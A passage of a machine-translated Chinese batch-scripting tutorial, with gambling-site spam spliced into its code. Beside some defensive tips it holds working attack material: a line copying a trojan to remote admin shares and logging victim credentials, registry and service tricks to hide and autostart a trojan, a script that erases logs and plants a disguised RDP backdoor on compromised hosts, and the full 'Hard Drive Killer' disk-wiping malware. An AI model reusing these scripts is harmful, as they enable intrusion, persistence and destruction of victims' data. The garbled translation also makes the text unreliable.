@copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3

>>victim.txt

四、管道命令的施用

1.│ 命令
Usage:第一条命令 │ 第二条命令 [│ 第三条命令...]
将率先条命令的结果作为第二条命令的参数来利用,记得在unix中这种办法很广阔。

sample:
time /t>>D:IP.log
netstat -n -p tcp│find ":3389">>D:IP.log
start Explorer

看出来了么?用于终端服务允许大家为客户自定义起先的程序,来兑现让客户运转下边这一个bat,以获得登

录客商的IP。

2.>、>>输出重定向命令
将一条命令或某些程序输出结果的重定向到特定文件中, > 与 >>的分裂在于,>会免去调原有文件中的内

容后写入钦点文件,而>>只会追加内容到钦定文件中,而不会变动在那之中的剧情。

sample1:
echo hello world>c:hello.txt (stupid example?)

sample2:
当下DLL木马盛行,大家领略system32是个捉迷藏的好地点,非常多木马都削尖了脑袋往那边钻,DLL马也不

不等,针对那点大家得以在设置好系统和供给的应用程序后,对该目录下的EXE和DLL文件作二个笔录:
运维CMD--转变目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
那样全体的EXE和DLL文件的名目都被分级记录到exeback.txt和dllback.txt中,
日后如开采万分但用古板的措施查不出难题时,则要考虑是或不是系统中曾经潜入DLL木马了.
这儿大家用同一的通令将system32下的EXE和DLL文件记录到别的的exeback1.txt和dllback1.txt中,然后运

行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比

较前后四次的DLL和EXE文件,并将结果输入到diff.txt中),那样我们就可以窥见某个多出来的DLL和EXE文件,

下一场经过查阅创立时间、版本、是或不是经过压缩等就可见相比较便于地看清出是或不是已经被DLL木马光顾了。没

有是最佳,要是部分话也无须直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到

回收站里,若系统尚未十三分反映再将之根本删除只怕提交给杀毒软件商场。

3.< 、>& 、<&
< 从文件中并非从键盘中读入命令输入。
>& 将贰个句柄的输出写入到另四个句柄的输入中。
<& 从多少个句柄读取输入并将其写入到另一个句柄输出中。
这一个并一时用,也就非常少做牵线。

五.怎么着用批管理文件来操作注册表

在侵袭进度中时时回操作注册表的特定的键值来促成自然的指标,比方:为了完毕掩盖后门、木马程序而删

除Run下残余的键值。也许创制三个劳动用以加载后门。当然大家也会修改注册表来加固系统恐怕更换系统

的某些属性,这么些都亟需大家对注册表操作有自然的摸底。上面咱们就先读书一下怎样使用.REG文件来操

作登记表.(大家能够用批处理来生成多少个REG文件)
有关注册表的操作,常见的是创立、修改、删除。

1.创建
始建分为二种,一种是创建子项(Subkey)

咱俩成立四个文本,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]

接下来施行该脚本,你就早就在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下创办了两个名称叫"黑客"的子

项。

另一种是创办贰个项目名称

那这种文件格式正是一级的文件格式,和您从注册表中程导弹出的文件格式一致,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"Door"=C:\WINNT\system32\door.exe
"Autodos"=dword:02

像这种类型就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下
新建了:Invader、door、about那八个项目
Invader的种类是"String value"
door的品类是"REG SZ value"
Autodos的项目是"DWO奇骏D value"

2.修改
修改相对来讲比较容易,只要把您需求修改的档期的顺序导出,然后用记事本进行修改,然后导入(regedit /s

)即可。

3.删除
咱俩先是来讲说删除一个项目名称,大家创设二个之类的文书:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Ex4rch"=-

实施该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就

被删除了;

小编们再看看删除八个子项,大家创立叁个之类的剧本:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

实施该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就曾经被删除了

深信不疑看到此间,.reg文件你基本已经调控了。那么未来的靶子就是用批管理来创立特定内容的.reg文件了

,记得大家前边说道的应用重定向符号能够很轻便地创建特定类型的文本。

samlpe1:如上面的不行例子,如想生成如投注册表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128

只供给如此:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg

samlpe2:
我们曾经在利用部分相比老的木子时,大概会在注册表的

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、

Runexec)]下生成一个键值用来贯彻木马的自运转.不过那样很轻巧暴光木马程序的路子,进而致使木马被查

杀,相对地倘诺将木马程序注册为系统服务则绝对安全一些.上面以布置好地IRC木马DSNX为例(名叫

windrv32.exe)

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=

c:winntsystem32windrv32.exe
@regedit /s patch.dll
@delete patch.dll

@REM [去除DSNXDE在注册表中的运维项,用sc.exe将之注册为系统重视服务的同期将其品质设为遮盖和

只读,并config为自运行]
@REM 那样不是更安全.

六.不错实例放送。
1.删减win2k/xp系统默许分享的批处理

------------------------ cut here then save as .bat or .cmd file

@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off

:Rem check parameters if null show usage.
if {%1}=={} goto :Usage

:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:delshare.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>>

c:delshare.reg
echo "AutoShareWks"=dword:00000000>> c:delshare.reg
echo "AutoShareServer"=dword:00000000>> c:delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:delshare.reg
echo Deleting the temprotarily files.
del c:delshare.reg
goto :END

:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF

:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.

:EOF
echo end of the batch file

------------------------ cut here then save as .bat or .cmd file

2.宏观巩固系统(给肉鸡打补丁)的批管理公事

------------------------ cut here then save as .bat or .cmd file

@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]

>>patch.dll

@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [不准分享]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止佚名登陆]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁绝及文件访谈和打印分享]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [明确命令禁止登陆前关机]

@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止突显前一个报到客商名称]
@regedit /s patch.dll

------------------------ cut here then save as .bat or .cmd file

上面发号施令是铲除肉鸡全体日志,禁止部分气息奄奄的劳务,并修改肉鸡的terminnal service留跳后路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:winntsystem32logfilesw3svc1*.* /f /q
@del c:winntsystem32logfilesw3svc2*.* /f /q
@del c:winntsystem32config*.event /f /q
@del c:winntsystem32dtclog*.* /f /q
@del c:winnt*.txt /f /q
@del c:winnt*.log /f /q
@net start w3svc
@net start event log
@rem [除去日志]

@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止部分险恶的服务。]

@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-

Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp

>>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
美高梅网站是多少 ,@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll
美高梅4858官方网站 ,@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,

>>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,

>>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows' message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe
@REM [修改3389三番五次,端口为8210(十六进制为0000二零一三),名字为Microsoft EventLog,留条后路]

3.Hard Drive Killer Pro Version 4.0(玩批管理到这些程度确实不轻易了。)

------------------------ cut here then save as .bat or .cmd file

@echo off
rem This program is dedecated to a very special person that does not want to be named.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo call format c: /q /u /autoSample >nul >>c:autoexec.bat
call attrib +r +h c:autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.

set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's d*amn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.

echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:./ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.

echo @prompt dir %%%%1:./ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

echo :enddc >>drivechk.bat

rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

rem Now we will use the program drivechk.bat to attain valid drive information.

:Sampledrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul
del drivechk.bat >nul
if %drive.==. set drive=c

:form_del
call attrib -r -h c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) do call c:temp.bat %%%%a Bunga >nul >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . .

>>c:autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a: >nul >>c:autoexec.bat
echo cd >>c:autoexec.bat
echo cls >>c:autoexec.bat
echo echo Welcome to the land of death. Munga Bunga's Multiple Hard Drive Killer version 4.0.

>>c:autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to

tell you the following. . . >>c:autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted.

>>c:autoexec.bat
echo echo 2. Love is important, if you have it, truly, don't let go of it like I did!

>>c:autoexec.bat
echo echo 3. If you are NOT a vegetarian, then you are a murderer, and I'm glad your HD is

dead. >>c:autoexec.bat
echo echo 4. Don't support the following: War, Racism, Drugs and the Liberal

Party.>>c:autoexec.bat

echo echo. >>c:autoexec.bat
echo echo Regards, >>c:autoexec.bat
echo echo. >>c:autoexec.bat
echo echo Munga Bunga >>c:autoexec.bat
call attrib +r +h c:autoexec.bat

:makedir
if exist c:temp.bat attrib -r -h c:temp.bat >nul
echo @echo off >c:temp.bat
echo %%1: >>c:temp.bat
echo cd >>c:temp.bat
echo :startmd >>c:temp.bat
echo for %%%%a in ("if not exist %%2nul md %%2" "if exist %%2nul cd %%2") do %%%%a

>>c:temp.bat
echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:temp.bat
echo if not exist %%1:%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%

%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2%%2nul goto

startmd >>c:temp.bat
call attrib +r +h c:temp.bat >nul

cls
echo Initializing Variables . . .
rem deltree /y %%a:*. only eliminates directories, hence leaving the file created above for

further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
for %%a in (%drive%) call attrib -r -h %%a: /S >nul
call attrib +r +h c:temp.bat >nul
call attrib +r +h c:autoexec.bat >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .

for %%a in (%drive%) call deltree /y %%a:*. >nul
cls
echo Initializing Variables . . .
echo Validating Data . . .
echo Analyzing System Structure . . .
echo Initializing Application . . .
echo Starting Application . . .
for %%a in (%drive%) do call c:temp.bat %%a Munga >nul

cls
echo Thank you for using a Munga Bunga product.
echo.
echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius.
echo.
echo Here is a joke for you . . .
echo.
echo Q). What's the worst thing about being an egg?
echo A). You only get laid once.
echo.
echo HAHAHAHA, get it? Don't you just love that one?
echo.
echo Regards,
echo.
echo Munga Bunga

:end

rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
rem Author: Munga Bunga - from Australia, the land full of retarded Australian's (help me get

out of here).

本文由美高梅网站是多少发布于美高梅-操作,转载请注明出处:转百度知道,BAT命令介绍

上一篇:没有了 下一篇:没有了
猜你喜欢
热门排行
精彩图文